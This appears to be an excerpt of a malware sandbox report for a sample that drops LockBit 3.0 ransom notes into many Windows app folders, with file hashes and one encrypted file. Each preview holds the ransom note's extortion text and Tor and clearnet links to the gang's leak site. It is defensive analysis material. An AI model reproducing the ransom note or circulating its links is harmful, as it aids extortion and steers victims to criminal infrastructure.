                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.977241421521345
                Encrypted:false
                SSDEEP:192:5ShfyvSYL5wtzc6PK8Zdb7Ex4rPABqEcMQno:5Shfyvf6ZVPHdb7K4UIEcPo
                MD5:DF3933441512DC9B5D8BA2913B5FECA2
                SHA1:A17435F8EADF3E25EA4FC03000D04E0307BE1CD4
                SHA-256:6DBEDA5E927CCA46FAF153E400CCA58F0525E33FC916FBF1CBF6101B72E83F0A
                SHA-512:A5CE9DE022348430F8C90BFA6157750DD26FF63BD0F64F1253E6154FF0DC9594F595C7EA672C29CC3D244425617496A55805C4B05B4B8B01883926E030483FC1
                Malicious:false
                Preview:...GkB.)..]...y.y..4.{.g'.....rI>.I.9-..N..2..#.~,;...4.1.J..K..&.../....4;.........TU......:.dnt..*."xh$...!9...4.H....:g..V6.j......iz...%.^.\..j?E..Z..A.8 P..-...5....f.x.3.g.7?..).E. .:.S.N..~as..7.;...8[3b.Avr9"......X.>...|.(..[,.k.Q..|.NA^k......v..g.W.x...%.>.&....3._AAJ!E.]...n......>.2j%D......%..TD.R.2...9W.........%.....A....j.-.Jn.d.Yl.-d...j../..z!J...G7d..-.]..-...g......h.L....l....7M..4..)..r..K....L..c....#... ...Bg.M...\...H.:C.........;...1......'...K...%i....o.....|.......$....... .Q.>.O...TB_....~..^....b.QF0..b......&-..w.............!cn. .`..].#..QL..$..aa../E..X...G$*.k3.,U..6mviS.B"............j...9...$...{..'#..E[..S....nf.....sS....B.....BH...ud..|..=T....c..t.8.....0v...&f?Q....a.T&..:)..Ej..3.......,F..u..b./....%(..6|.......C!..8.0..+.\.b./..B..)......N.9^...Cn9.H*.$..M...X.._.....1i.E.,...~.F...i./....P..^.}._L.:b.....F....`.x.-e...I....S.M..p...@..Y..!t.Rd...|js'.t....o..7y.&o...p...oC...s..*...5Y........Nu

                C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.
